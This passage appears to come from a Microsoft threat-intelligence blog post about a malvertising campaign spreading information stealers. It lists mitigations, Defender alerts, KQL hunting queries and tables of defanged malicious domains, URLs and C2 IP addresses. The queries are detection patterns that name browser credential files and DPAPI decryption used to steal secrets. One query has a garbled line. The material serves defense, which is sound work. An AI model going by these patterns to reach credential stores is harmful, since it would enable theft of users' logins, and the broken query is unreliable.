subsystem&nbsp;<\/li>\n<\/ul>\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-use-of-copied-or-impersonated-system-tools-preview\">Block<\/a> use of copied or impersonated system tools<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3 class=\"wp-block-heading\" id=\"strengthen-operating-environment-configuration\">Strengthen operating environment configuration<\/h3>\n<ul class=\"wp-block-list\">\n<li>Require <a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/admin\/security-and-compliance\/set-up-multi-factor-authentication\">multifactor authentication (MFA)<\/a>. While certain attacks such as adversary-in-the-middle (AiTM) phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats. <\/li>\n<li>Implement&nbsp;Entra ID&nbsp;<a href=\"https:\/\/learn.microsoft.com\/azure\/active-directory\/authentication\/concept-authentication-strengths\">Conditional Access authentication strength<\/a>&nbsp;to require phishing-resistant authentication for employees and external users for critical apps.<\/li>\n<li>Encourage users to use Microsoft Edge and other web browsers that support <a href=\"https:\/\/learn.microsoft.com\/deployedge\/microsoft-edge-security-smartscreen\">Microsoft Defender SmartScreen<\/a>, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.<\/li>\n<li>Enable&nbsp;<a href=\"https:\/\/learn.microsoft.com\/previous-versions\/windows\/it-pro\/windows-server-2008-R2-and-2008\/cc753488%28v=ws.11%29\" target=\"_blank\" rel=\"noreferrer noopener\">Network Level Authentication<\/a> for Remote Desktop Service connections.<\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem\" target=\"_blank\" rel=\"noreferrer noopener\">Enable<\/a> Local Security Authority (LSA) protection to block credential stealing from the Windows local security authority subsystem.&nbsp;<\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/windows\/security\/application-security\/application-control\/windows-defender-application-control\/applocker\/applocker-overview\" target=\"_blank\" rel=\"noreferrer noopener\">AppLocker<\/a>&nbsp;can restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.<\/li>\n<\/ul>\n<h2 class=\"wp-block-heading\" id=\"microsoft-defender-xdr-detections\">Microsoft Defender XDR detections<\/h2>\n<p>Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.<\/p>\n<p>Customers with provisioned access can also use <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/security-copilot-in-microsoft-365-defender\">Microsoft Security Copilot in Microsoft Defender<\/a> to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.<\/p>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-antivirus\">Microsoft Defender Antivirus<\/h3>\n<p>Microsoft Defender Antivirus detects threat components as the following malware:<\/p>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-for-endpoint\">Microsoft Defender for Endpoint<\/h3>\n<p>The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.<\/p>\n<ul class=\"wp-block-list\">\n<li>Possible theft of passwords and other sensitive web browser information<\/li>\n<li>Possible Lumma Stealer activity<\/li>\n<li>Renamed AutoIt tool<\/li>\n<li>Use of living-off-the-land binary to run malicious code<\/li>\n<li>Suspicious startup item creation<\/li>\n<li>Suspicious Scheduled Task Process Launched<\/li>\n<li>Suspicious DPAPI Activity<\/li>\n<li>Suspicious implant process from a known emerging threat<\/li>\n<li>Security software tampering<\/li>\n<li>Suspicious activity linked to a financially motivated threat actor detected<\/li>\n<li>Ransomware-linked threat actor detected<\/li>\n<li>A file or network connection related to a ransomware-linked emerging threat activity group detected<\/li>\n<li>Information stealing malware activity<\/li>\n<li>Possible NetSupport Manager activity<\/li>\n<li>Suspicious sequence of exploration activities<\/li>\n<li>Defender detection bypass<\/li>\n<li>Suspicious Location of Remote Management Software<\/li>\n<li>A process was injected with potentially malicious code<\/li>\n<li>Process hollowing detected<\/li>\n<li>Suspicious PowerShell download or encoded command execution<\/li>\n<li>Suspicious PowerShell command line<\/li>\n<li>Suspicious behavior by cmd.exe was observed<\/li>\n<li>Suspicious Security Software Discovery<\/li>\n<li>Suspicious discovery indicative of Virtualization\/Sandbox Evasion<\/li>\n<li>A process was launched on a hidden desktop<\/li>\n<li>Monitored keystrokes<\/li>\n<li>Suspicious Process Discovery<\/li>\n<li>Suspicious Javascript process<\/li>\n<li>A suspicious file was observed<\/li>\n<li>Anomaly detected in ASEP registry<\/li>\n<\/ul>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-for-cloud\">Microsoft Defender for Cloud<\/h3>\n<p>The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.<\/p>\n<ul class=\"wp-block-list\">\n<li>Detected suspicious combination of HTA and PowerShell<\/li>\n<li>Suspicious PowerShell Activity Detected<\/li>\n<li>Traffic detected from IP addresses recommended for blocking<\/li>\n<li>Attempted communication with suspicious sinkholed domain<\/li>\n<li>Communication with suspicious domain identified by threat intelligence<\/li>\n<li>Detected obfuscated command line<\/li>\n<li>Detected suspicious named pipe communications<\/li>\n<\/ul>\n<h2 class=\"wp-block-heading\" id=\"microsoft-security-copilot\">Microsoft Security Copilot<\/h2>\n<p>Security Copilot customers can use the standalone experience to <a href=\"https:\/\/learn.microsoft.com\/copilot\/security\/prompting-security-copilot#create-your-own-prompts\">create their own prompts<\/a> or run the following <a href=\"https:\/\/learn.microsoft.com\/copilot\/security\/using-promptbooks\">pre-built promptbooks<\/a> to automate incident response or investigation tasks related to this threat:<\/p>\n<ul class=\"wp-block-list\">\n<li>Incident investigation<\/li>\n<li>Microsoft User analysis<\/li>\n<li>Threat actor profile<\/li>\n<li>Threat Intelligence 360 report based on MDTI article<\/li>\n<li>Vulnerability impact assessment<\/li>\n<\/ul>\n<p>Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.<\/p>\n<h2 class=\"wp-block-heading\" id=\"threat-intelligence-reports\">Threat intelligence reports<\/h2>\n<p>Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.<\/p>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-threat-intelligence\">Microsoft Defender Threat Intelligence<\/h3>\n<p>Microsoft Security Copilot customers can also use the <a href=\"https:\/\/learn.microsoft.com\/defender\/threat-intelligence\/security-copilot-and-defender-threat-intelligence?bc=%2Fsecurity-copilot%2Fbreadcrumb%2Ftoc.json&amp;toc=%2Fsecurity-copilot%2Ftoc.json#turn-on-the-security-copilot-integration-in-defender-ti\">Microsoft Security Copilot integration<\/a> in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the <a href=\"https:\/\/learn.microsoft.com\/defender\/threat-intelligence\/using-copilot-threat-intelligence-defender-xdr\">embedded experience<\/a> in the Microsoft Defender portal to get more information about this threat actor.<\/p>\n<h2 class=\"wp-block-heading\" id=\"hunting-queries\">Hunting queries<\/h2>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-xdr\">Microsoft Defender XDR<\/h3>\n<p>Microsoft Defender XDR customers can run the following query to find related activity in their networks:<\/p>\n<p><strong>Github-hosted first-stage payload certificate serial numbers<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"34\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet specificSerialNumbers = dynamic([\"70093af339876742820d7941\", \"15042512e67e8275f3f7f36b\", \"5608cab7e2ce34d53abcbb73\", \"0fa27d2553f24da79d1cc6bd8773ee9a\", \"7a7bf2ae0cbc0f5500db2946\", \"30d6c83a715bddb32e7956fe52d6b352\", \"301385aa36fae635e74bb88e\", \"30013cbbb16a7fd3c57f82707fb99c32\", \"5d00264a6b804ae6b28d9b16\", \"3a9c76f8304f77bd271921d9982f1ab6\", \"01f2c6c363767056abd80e9c\", \"0b09c88c0c8d15bed51a9eb4440f4bb0\"]); union\n( DeviceFileCertificateInfo | where CertificateSerialNumber in (specificSerialNumbers) | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp\n),\n( DeviceTvmCertificateInfo | where SerialNumber in (specificSerialNumbers) | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate\n)\n<\/pre>\n<\/div>\n<p><strong>Dropbox-hosted first-stage payload certificate serial number<\/strong><\/p>\n<p>Surface devices that may contain first-stage payloads hosted on Dropbox related to this activity. This query will search for the unique serial number of the known certificate related to this activity.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"23\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet specificSerialNumbers = dynamic([\"7a7bf2ae0cbc0f5500db2946\"]); union\n( DeviceFileCertificateInfo | where CertificateSerialNumber in (specificSerialNumbers) | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp\n),\n( DeviceTvmCertificateInfo | where SerialNumber in (specificSerialNumbers) | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate\n)\n<\/pre>\n<\/div>\n<p><strong>Second-stage C2 IP addresses<\/strong><\/p>\n<p>Surface devices that may have communicated with second stage C2 IP addresses related to this activity.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"60\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet ipAddressToSearch = dynamic([\"159.100.18.192\", \"192.142.10.246\", \"79.133.46.35\", \"84.200.24.191\", \"84.200.24.26\", \"89.187.28.253\", \"185.92.181.1\"]);\nunion isfuzzy=true\n( AzureDiagnostics | where identity_claim_ipaddr_s == ipAddressToSearch or conditions_sourceIP_s == ipAddressToSearch or CallerIPAddress == ipAddressToSearch or clientIP_s == ipAddressToSearch or clientIp_s == ipAddressToSearch or primaryIPv4Address_s == ipAddressToSearch or conditions_destinationIP_s == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"AzureDiagnostics\", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, conditions_destinationIP_s), AdditionalInfo = tostring(AdditionalFields)\n),\n( IdentityQueryEvents | where IPAddress == ipAddressToSearch or DestinationIPAddress == ipAddressToSearch | project Timestamp, Table = \"IdentityQueryEvents\", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query\n),\n( AADSignInEventsBeta | where IPAddress == ipAddressToSearch | project Timestamp, Table = \"AADSignInEventsBeta\", IPAddress, AdditionalInfo = UserAgent\n),\n( Heartbeat | where ComputerIP == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"Heartbeat\", IPAddress = ComputerIP, AdditionalInfo = OSName\n),\n( CloudAppEvents | where IPAddress == ipAddressToSearch | project Timestamp, Table = \"CloudAppEvents\", IPAddress, AdditionalInfo = UserAgent\n),\n( DeviceNetworkEvents | where LocalIP == ipAddressToSearch or RemoteIP == ipAddressToSearch | project Timestamp, Table = \"DeviceNetworkEvents\", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine\n),\n( AADUserRiskEvents | where IpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"AADUserRiskEvents\", IPAddress = IpAddress, AdditionalInfo = RiskEventType\n),\n( AADNonInteractiveUserSignInLogs | where IPAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"AADNonInteractiveUserSignInLogs\", IPAddress, AdditionalInfo = UserAgent\n),\n( MicrosoftAzureBastionAuditLogs | where TargetVMIPAddress == ipAddressToSearch or ClientIpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"MicrosoftAzureBastionAuditLogs\", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent\n)\n| sort by Timestamp desc\n<\/pre>\n<\/div>\n<p><strong>Fourth-stage C2 IP addresses<\/strong><\/p>\n<p>Surface devices that may have communicated with fourth stage C2 IP addresses related to this activity.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"57\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet ipAddressToSearch = dynamic([\"45.141.84.60\", \"91.202.233.18\", \"154.216.20.131\", \"5.10.250.240\", \"79.132.128.77\"]);\nunion isfuzzy=true\n( AzureDiagnostics | where identity_claim_ipaddr_s == ipAddressToSearch or conditions_sourceIP_s == ipAddressToSearch or CallerIPAddress == ipAddressToSearch or clientIP_s == ipAddressToSearch or clientIp_s == ipAddressToSearch or primaryIPv4Address_s == ipAddressToSearch or conditions_destinationIP_s == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"AzureDiagnostics\", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, o),\n( IdentityQueryEvents | where IPAddress == ipAddressToSearch or DestinationIPAddress == ipAddressToSearch | project Timestamp, Table = \"IdentityQueryEvents\", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query\n),\n( AADSignInEventsBeta | where IPAddress == ipAddressToSearch | project Timestamp, Table = \"AADSignInEventsBeta\", IPAddress, AdditionalInfo = UserAgent\n),\n( Heartbeat | where ComputerIP == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"Heartbeat\", IPAddress = ComputerIP, AdditionalInfo = OSName\n),\n( CloudAppEvents | where IPAddress == ipAddressToSearch | project Timestamp, Table = \"CloudAppEvents\", IPAddress, AdditionalInfo = UserAgent\n),\n( DeviceNetworkEvents | where LocalIP == ipAddressToSearch or RemoteIP == ipAddressToSearch | project Timestamp, Table = \"DeviceNetworkEvents\", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine\n),\n( AADUserRiskEvents | where IpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"AADUserRiskEvents\", IPAddress = IpAddress, AdditionalInfo = RiskEventType\n),\n( AADNonInteractiveUserSignInLogs | where IPAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"AADNonInteractiveUserSignInLogs\", IPAddress, AdditionalInfo = UserAgent\n),\n( MicrosoftAzureBastionAuditLogs | where TargetVMIPAddress == ipAddressToSearch or ClientIpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = \"MicrosoftAzureBastionAuditLogs\", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent\n)\n| sort by Timestamp desc\n<\/pre>\n<\/div>\n<p><strong>Browser remote debugging&nbsp;<\/strong><\/p>\n<p>Identify AutoIT scripts launching chromium-based browsers (such as <em>chrome.exe<\/em>, <em>msedge.exe<\/em>, <em>brave.exe<\/em>) in remote debugging mode.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"21\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nDeviceProcessEvents | where InitiatingProcessVersionInfoInternalFileName == \"AutoIt3.exe\" \/\/ Check for \"AutoIt\" scripts, even if it's renamed. | where ProcessCommandLine has \"--remote-debugging-port\" \/\/ Identify Chromium based browsers (chrome.exe, msedge.exe, brave.exe etc) being launched in remote debugging mode. | project DeviceId, Timestamp, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine\n<\/pre>\n<\/div>\n<p><strong>DPAPI decryption via AutoIT<\/strong><\/p>\n<p>Identify DPAPI decryption activity originating from AutoIT scripts.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"22\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nDeviceEvents\n| where ActionType == \"DpapiAccessed\"\n| where InitiatingProcessVersionInfoInternalFileName == \"AutoIt3.exe\"\n| where (AdditionalFields has_any(\"Google Chrome\", \"Microsoft Edge\") and AdditionalFields has_any(\"SPCryptUnprotect\"))\n| extend json = parse_json(AdditionalFields)\n| extend dataDesp = tostring(json.DataDescription.PropertyValue)\n| extend opType = tostring(json.OperationType.PropertyValue)\n| where (dataDesp in~ (\"Google Chrome\", \"Microsoft Edge\") and opType =~ \"SPCryptUnprotect\")\n| project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType\n<\/pre>\n<\/div>\n<p><strong>DPAPI decryption via LOLBAS binaries<\/strong><\/p>\n<p>Identify DPAPI decryption activity originating from LOLBAS binaries (<em>RegAsm.exe<\/em> and <em>MSBuild.exe<\/em>).<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"23\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nDeviceEvents\n| where ActionType == \"DpapiAccessed\"\n| where InitiatingProcessFileName has_any (\"RegAsm.exe\", \"MSBuild.exe\")\n| where (AdditionalFields has_any(\"Google Chrome\", \"Microsoft Edge\") and AdditionalFields has_any(\"SPCryptUnprotect\"))\n| extend json = parse_json(AdditionalFields)\n| extend dataDesp = tostring(json.DataDescription.PropertyValue)\n| extend opType = tostring(json.OperationType.PropertyValue)\n| where (dataDesp in~ (\"Google Chrome\", \"Microsoft Edge\") and opType =~ \"SPCryptUnprotect\")\n| project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType\n<\/pre>\n<\/div>\n<p><strong>Sensitive browser file access via AutoIT<\/strong><\/p>\n<p>Identify AutoIT scripts (renamed or otherwise) accessing sensitive browser files.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"26\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet browserDirs = pack_array(@\"\\Google\\Chrome\\User Data\\\", @\"\\Microsoft\\Edge\\User Data\\\", @\"\\Mozilla\\Firefox\\Profiles\\\"); let browserSensitiveFiles = pack_array(\"Web Data\", \"Login Data\", \"key4.db\", \"formhistory.sqlite\", \"cookies.sqlite\", \"logins.json\", \"places.sqlite\", \"cert9.db\");\nDeviceEvents\n| where AdditionalFields has_any (\"FileOpenSource\") \/\/ Filter for \"File Open\" events.\n| where InitiatingProcessVersionInfoInternalFileName == \"AutoIt3.exe\"\n| where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles)) | extend json = parse_json(AdditionalFields)\n| extend File_Name = tostring(json.FileName.PropertyValue)\n| where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles))\n| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name\n<\/pre>\n<\/div>\n<p><strong>Sensitive browser file access via LOLBAS binaries<\/strong><\/p>\n<p>Identify LOLBAS binaries (<em>RegAsm.exe<\/em> and <em>MSBuild.exe<\/em>) accessing sensitive browser files.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"27\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet browserDirs = pack_array(@\"\\Google\\Chrome\\User Data\\\", @\"\\Microsoft\\Edge\\User Data\\\", @\"\\Mozilla\\Firefox\\Profiles\\\"); let browserSensitiveFiles = pack_array(\"Web Data\", \"Login Data\", \"key4.db\", \"formhistory.sqlite\", \"cookies.sqlite\", \"logins.json\", \"places.sqlite\", \"cert9.db\");\nDeviceEvents\n| where AdditionalFields has_any (\"FileOpenSource\") \/\/ Filter for \"File Open\" events.\n| where InitiatingProcessFileName has_any (\"RegAsm.exe\", \"MSBuild.exe\") | where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles)) | extend json = parse_json(AdditionalFields)\n| extend File_Name = tostring(json.FileName.PropertyValue)\n| where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles))\n| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name\n<\/pre>\n<\/div>\n<h3 class=\"wp-block-heading\" id=\"microsoft-sentinel\">Microsoft Sentinel<\/h3>\n<p>Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the <a href=\"https:\/\/learn.microsoft.com\/azure\/sentinel\/sentinel-solutions-deploy\">Microsoft Sentinel Content Hub<\/a> to have the analytics rule deployed in their Sentinel workspace.<\/p>\n<h2 class=\"wp-block-heading\" id=\"indicators-of-compromise\">Indicators of compromise<\/h2>\n<p><strong>Streaming website domains with malicious iframe<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>movies7[.]net<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>0123movie[.]art<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Malicious iframe redirector domains<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>fle-rvd0i9o8-moo[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>0cbcq8mu[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Malvertisement distributor<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>widiaoexhe[.]top<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Malvertising website domains<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td><em>widiaoexhe[.]top<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td><em>predictivdisplay[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td><em>buzzonclick[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td><em>pulseadnetwork[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td><em>onclickalgo[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<tr>\n<td><em>liveadexchanger[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<tr>\n<td><em>greatdexchange[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<tr>\n<td><em>dexpredict[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<tr>\n<td><em>onclickperformance[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>GitHub referral URLs<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"27\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/pmpdm[.]com\/webcheck35\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/startherehosting[.]net\/todaypage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/kassalias[.]com\/pageagain\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/sacpools[.]com\/pratespage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/dreamstorycards[.]com\/amzpage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/primetimeessentials[.]com\/newpagyes\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/razorskigrips[.]com\/perfect\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/lakeplacidluxuryhomes[.]com\/webpage37<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/ageless-skincare[.]com\/gn\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/clarebrownmusic[.]com\/goodday\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/razorskigrips[.]com\/gn\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/compass-point-yachts[.]com\/nicepage77\/pro77.php<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/razorskigrips[.]com\/goodk\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/lilharts[.]com\/propage6\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/enricoborino[.]com\/propage66\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/afterpm[.]com\/pricedpage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/eaholloway[.]com\/updatepage333\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/physicaltherapytustin[.]com\/webhtml\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/physicaltherapytustin[.]com\/web-X\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/razorskigrips[.]com\/newnewpage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/statsace[.]com\/web_us\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/nationpains[.]com\/safeweb3\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/vjav[.]com\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/thegay[.]com\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/olopruy[.]com\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/desi-porn[.]tube\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/cumpaicizewoa[.]net\/partitial\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/ak.ptailadsol[.]net\/partitial\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/egrowz[.]com\/webview\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/or-ipo[.]com\/nice\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>GitHub URLs<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"30\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/down4up\/<\/em><\/td>\n<td>&nbsp;URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/g1lsetup\/iln77<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr 